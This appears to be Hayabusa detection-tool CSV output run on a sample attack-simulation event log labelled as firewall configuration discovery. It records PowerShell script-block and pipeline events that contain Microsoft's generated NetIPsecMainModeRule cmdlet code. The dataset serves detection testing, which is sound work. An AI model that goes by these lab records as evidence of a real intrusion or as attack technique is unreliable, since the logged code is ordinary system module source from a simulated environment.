${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 